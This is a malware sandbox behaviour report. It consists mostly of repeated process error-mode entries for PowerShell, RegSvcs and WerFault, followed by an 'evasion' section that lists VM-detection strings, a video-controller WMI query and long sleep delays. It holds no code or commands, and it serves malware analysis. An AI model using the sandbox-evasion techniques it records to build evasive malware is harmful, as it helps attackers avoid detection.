          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3666Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3647Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 7662Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 2178Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008Thread sleep time: -3689348814741908s >= -30000sJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7164Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
          Source: Amcache.hve.10.drBinary or memory string: VMware
          Source: Amcache.hve.10.drBinary or memory string: VMware Virtual USB Mouse
          Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin
          Source: Amcache.hve.10.drBinary or memory string: VMware, Inc.
          Source: Amcache.hve.10.drBinary or memory string: VMware20,1hbin@
          Source: Amcache.hve.10.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
          Source: Amcache.hve.10.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: Amcache.hve.10.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.10.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.10.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
          Source: Amcache.hve.10.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
          Source: Amcache.hve.10.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
          Source: RegSvcs.exe, 00000003.00000002.3278703191.0000000000C0C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: Amcache.hve.10.drBinary or memory string: vmci.sys
          Source: Amcache.hve.10.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
          Source: Amcache.hve.10.drBinary or memory string: vmci.syshbin`
          Source: Amcache.hve.10.drBinary or memory string: \driver\vmci,\driver\pci
          Source: Amcache.hve.10.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
          Source: Amcache.hve.10.drBinary or memory string: VMware20,1
          Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Generation Counter
          Source: Amcache.hve.10.drBinary or memory string: NECVMWar VMware SATA CD00
          Source: Amcache.hve.10.drBinary or memory string: VMware Virtual disk SCSI Disk Device
          Source: Amcache.hve.10.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
          Source: Amcache.hve.10.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
          Source: Amcache.hve.10.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
          Source: Amcache.hve.10.drBinary or memory string: VMware PCI VMCI Bus Device
          Source: Amcache.hve.10.drBinary or memory string: VMware VMCI Bus Device
          Source: Amcache.hve.10.drBinary or memory string: VMware Virtual RAM
